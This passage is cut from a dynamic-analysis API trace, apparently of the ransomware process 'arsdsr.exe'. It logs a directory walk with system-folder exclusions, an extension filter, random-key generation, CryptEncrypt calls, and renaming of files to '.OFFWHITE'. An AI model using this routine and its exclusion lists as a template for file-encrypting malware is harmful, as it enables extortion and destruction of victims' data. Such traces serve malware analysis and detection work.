Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\" [0151.550] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\", lpString2="vc_runtimeMinimum_x86.msi" | out: lpString1="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned="C:/Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" [0151.550] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.550] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.550] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0151.550] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0151.550] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0151.550] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0151.551] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0151.551] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0151.551] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0151.551] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0151.551] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0151.551] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0151.551] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0151.551] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0151.551] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0151.551] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0151.551] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0151.551] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0151.551] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48395900, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x48395900, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x48395900, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0151.551] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0151.551] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0151.551] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0151.551] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 0 [0151.551] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0151.551] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfaaff840, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", cAlternateFileName="{CA675~1")) returned 1 [0151.551] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2=".") returned 1 [0151.551] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="..") returned 1 [0151.551] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="...") returned 1 [0151.551] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="windows") returned -1 [0151.551] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="$recycle.bin") returned 1 [0151.551] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="rsa") returned -1 [0151.551] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="ntuser.dat") returned -1 [0151.551] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="programdata") returned -1 [0151.551] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="appdata") returned -1 [0151.552] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="program files") returned -1 [0151.552] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="program files (x86)") returned -1 [0151.552] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0151.552] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" | out: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" [0151.552] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\") returned="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\" [0151.552] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\") returned="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\" [0151.552] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" [0151.552] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfaaff840, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0151.553] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.553] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfaaff840, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0151.553] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.553] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.553] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfe3882c0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x28e, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0151.553] lstrcmpiW (lpString1="state.rsm", lpString2=".") returned 1 [0151.553] lstrcmpiW (lpString1="state.rsm", lpString2="..") returned 1 [0151.553] lstrcmpiW (lpString1="state.rsm", lpString2="...") returned 1 [0151.553] lstrcmpiW (lpString1="state.rsm", lpString2="windows") returned -1 [0151.553] lstrcmpiW (lpString1="state.rsm", lpString2="$recycle.bin") returned 1 [0151.553] lstrcmpiW (lpString1="state.rsm", lpString2="rsa") returned 1 [0151.553] lstrcmpiW (lpString1="state.rsm", lpString2="ntuser.dat") returned 1 [0151.553] lstrcmpiW (lpString1="state.rsm", lpString2="programdata") returned 1 [0151.553] lstrcmpiW (lpString1="state.rsm", lpString2="appdata") returned 1 [0151.553] lstrcmpiW (lpString1="state.rsm", lpString2="program files") returned 1 [0151.553] lstrcmpiW (lpString1="state.rsm", lpString2="program files (x86)") returned 1 [0151.553] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\") returned="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\" [0151.553] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", lpString2="state.rsm" | out: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" [0151.553] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.553] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.553] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0151.553] lstrcmpiW (lpString1=".rsm", lpString2=".exe") returned 1 [0151.553] lstrcmpiW (lpString1=".rsm", lpString2=".log") returned 1 [0151.553] lstrcmpiW (lpString1=".rsm", lpString2=".cab") returned 1 [0151.553] lstrcmpiW (lpString1=".rsm", lpString2=".cmd") returned 1 [0151.553] lstrcmpiW (lpString1=".rsm", lpString2=".com") returned 1 [0151.554] lstrcmpiW (lpString1=".rsm", lpString2=".cpl") returned 1 [0151.554] lstrcmpiW (lpString1=".rsm", lpString2=".ini") returned 1 [0151.554] lstrcmpiW (lpString1=".rsm", lpString2=".dll") returned 1 [0151.554] lstrcmpiW (lpString1=".rsm", lpString2=".url") returned -1 [0151.554] lstrcmpiW (lpString1=".rsm", lpString2=".ttf") returned -1 [0151.554] lstrcmpiW (lpString1=".rsm", lpString2=".mp3") returned 1 [0151.554] lstrcmpiW (lpString1=".rsm", lpString2=".pif") returned 1 [0151.554] lstrcmpiW (lpString1=".rsm", lpString2=".mp4") returned 1 [0151.554] lstrcmpiW (lpString1=".rsm", lpString2=".OFFWHITE") returned 1 [0151.554] lstrcmpiW (lpString1=".rsm", lpString2=".msi") returned 1 [0151.554] lstrcmpiW (lpString1="state.rsm", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0151.554] GetProcessHeap () returned 0x500000 [0151.554] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526d98 [0151.554] CreateFileW (lpFileName="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0151.688] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=654) returned 1 [0151.688] GetProcessHeap () returned 0x500000 [0151.688] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0151.688] GetProcessHeap () returned 0x500000 [0151.688] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0151.688] GetProcessHeap () returned 0x500000 [0151.688] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0151.688] GetProcessHeap () returned 0x500000 [0151.688] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0151.689] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.689] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.689] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0151.689] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.689] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.689] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0151.689] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.689] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.689] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295dc90*=0x100) returned 1 [0151.689] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.689] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.689] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0151.689] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x28e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.689] SetLastError (dwErrCode=0x0) [0151.689] WriteFile (in: hFile=0x21c, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0151.690] GetLastError () returned 0x0 [0151.690] GetLastError () returned 0x0 [0151.690] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x38e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.691] WriteFile (in: hFile=0x21c, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0151.691] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x48e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.691] WriteFile (in: hFile=0x21c, lpBuffer=0x526d98*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x526d98*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0151.691] GetProcessHeap () returned 0x500000 [0151.691] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x28e) returned 0x53e5b0 [0151.691] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.691] ReadFile (in: hFile=0x21c, lpBuffer=0x53e5b0, nNumberOfBytesToRead=0x28e, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x53e5b0*, lpNumberOfBytesRead=0x295dec0*=0x28e, lpOverlapped=0x0) returned 1 [0151.691] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.691] WriteFile (in: hFile=0x21c, lpBuffer=0x53e5b0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53e5b0*, lpNumberOfBytesWritten=0x295decc*=0x28e, lpOverlapped=0x0) returned 1 [0151.691] GetProcessHeap () returned 0x500000 [0151.691] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53e5b0 | out: hHeap=0x500000) returned 1 [0151.691] CloseHandle (hObject=0x21c) returned 1 [0151.691] GetProcessHeap () returned 0x500000 [0151.691] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0151.691] GetProcessHeap () returned 0x500000 [0151.691] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0151.691] GetProcessHeap () returned 0x500000 [0151.691] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0151.691] GetProcessHeap () returned 0x500000 [0151.691] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0151.692] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" | out: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" [0151.692] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.OFFWHITE") returned="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.OFFWHITE" [0151.692] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), lpNewFileName="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.OFFWHITE" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.offwhite")) returned 1 [0151.692] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xf0a0a700, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f398, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0151.692] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2=".") returned 1 [0151.692] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="..") returned 1 [0151.692] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="...") returned 1 [0151.692] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="windows") returned -1 [0151.692] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="$recycle.bin") returned 1 [0151.692] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="rsa") returned 1 [0151.693] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="ntuser.dat") returned 1 [0151.693] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="programdata") returned 1 [0151.693] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="appdata") returned 1 [0151.693] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="program files") returned 1 [0151.693] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="program files (x86)") returned 1 [0151.693] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\") returned="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\" [0151.693] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", lpString2="vcredist_x64.exe" | out: lpString1="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned="C:/Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" [0151.693] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.693] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.693] PathFindExtensionW (pszPath="vcredist_x64.exe") returned=".exe" [0151.693] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0151.693] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xf0a0a700, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f398, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0151.693] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0151.693] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", cAlternateFileName="{CF2BE~1.610")) returned 1 [0151.693] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2=".") returned 1 [0151.693] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="..") returned 1 [0151.693] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="...") returned 1 [0151.693] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="windows") returned -1 [0151.693] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="$recycle.bin") returned 1 [0151.693] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="rsa") returned -1 [0151.693] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="ntuser.dat") returned -1 [0151.693] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="programdata") returned -1 [0151.693] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="appdata") returned -1 [0151.693] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="program files") returned -1 [0151.693] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="program files (x86)") returned -1 [0151.693] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0151.693] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030" [0151.693] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\" [0151.693] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\" [0151.693] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*" [0151.693] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*", lpFindFileData=0x295df18 | out: 